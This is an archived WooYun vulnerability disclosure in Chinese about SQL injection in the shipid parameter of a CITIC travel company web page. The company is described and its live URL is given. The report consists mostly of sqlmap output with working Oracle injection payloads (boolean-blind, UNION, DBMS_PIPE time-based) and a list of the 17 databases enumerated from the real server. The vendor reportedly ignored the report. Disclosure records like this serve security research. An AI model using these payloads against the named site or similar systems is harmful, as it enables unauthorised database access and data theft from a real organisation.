乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-11-12: 厂商已经主动忽略漏洞,细节向公众公开
公司成立于1987年,是中信集团的全资子公司。经营入境市场、出境市场、国内市场、签证业务、中国公民因私出入境的咨询和代办服务等旅行社业务以及旅游酒店业务和旅游资源开发业务。是国家特许经营中国公民出境游指定组团社、首批指定经营大陆居民赴台游业务的旅行社。中信旅游集团有限公司是全国“百强旅行社”和“5A级旅行社”,是首批北京市旅游标准化示范单位。
1.http://www.travel.citic.com/shipList.jsp?shipid=1660
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:---Place: GETParameter: shipid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: shipid=1660 AND 8987=8987 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: shipid=-4363 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(104)||CHR(114)||CHR(121)||CHR(113)||CHR(108)||CHR(88)||CHR(83)||CHR(74)||CHR(82)||CHR(89)||CHR(112)||CHR(65)||CHR(89)||CHR(99)||CHR(113)||CHR(97)||CHR(104)||CHR(116)||CHR(113) FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: shipid=1660 AND 4003=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(105)||CHR(119)||CHR(66),3)---web application technology: Nginx, JSPback-end DBMS: Oraclesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: shipid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: shipid=1660 AND 8987=8987 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: shipid=-4363 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(104)||CHR(114)||CHR(121)||CHR(113)||CHR(108)||CHR(88)||CHR(83)||CHR(74)||CHR(82)||CHR(89)||CHR(112)||CHR(65)||CHR(89)||CHR(99)||CHR(113)||CHR(97)||CHR(104)||CHR(116)||CHR(113) FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: shipid=1660 AND 4003=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(105)||CHR(119)||CHR(66),5)---web application technology: Nginx, JSPback-end DBMS: Oracleavailable databases [17]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SUBCITIC[*] SYS[*] SYSMAN[*] SYSTEM[*] TRAVELADMIN[*] TSMSYS[*] WMSYS[*] XDB
2.505个表
.
未能联系到厂商或者厂商积极拒绝